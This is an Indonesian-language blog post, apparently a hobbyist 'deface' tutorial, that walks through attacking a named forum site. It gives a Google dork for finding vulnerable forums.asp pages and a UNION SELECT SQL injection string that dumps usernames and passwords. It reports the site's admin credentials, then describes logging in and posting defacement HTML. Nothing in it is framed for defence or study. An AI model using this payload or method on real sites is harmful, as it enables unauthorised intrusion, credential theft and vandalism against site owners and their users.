hallo semua ..udah lama ane ga update ,berawal dari timeline twitter ane ,ada yang mau belajar deface jadi ane kepiran untuk bikin tutor ini :D hehe
1. ini dork nyaa : inurl:/forums.asp?iFor=
2. Pilih target,
contoh target:
http://www.coachgirl.com/forum/forum...set=58
3. apus angka dibelakang = seperti ini:
http://www.coachgirl.com/forum/forum...fset;=
4. terus = masukan SQL inject: umum nya udah tau kan
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
5. menjadi seperti ini:
http://www.coachgirl.com/forum/forum...,12+from+users
Tulisan yg berderet di bwhh nama 10 TOPICS itu adlh username
Tulisan yg di bawah nama DATED itu passwordnya
6. Cari Username Admin & Passwordnya.
Oke, pada web target yg jadi bahan tutor ini, ane nemuin username & password.
[*] Username: admin
[*] Password: default
7. Sekarang klik tulisan login yg ada diatas.
Nah, login udah berhasil , klik tulisan "POST NEW TOPICS"
8. Isi subjectnya ...
Contoh:
hacked by yusuf genzo
trs masukin script deface HTML yang udah agan miliki ke subject.
9. gimana bisa kan ....horeeeee :D :b
selamat gan udah berhasil :D . hehehe
-semoga bermanfaat ya gan.
salam ane yusufgenzo
follow twitter : @yusufgenzoo
komennya
BalasHapus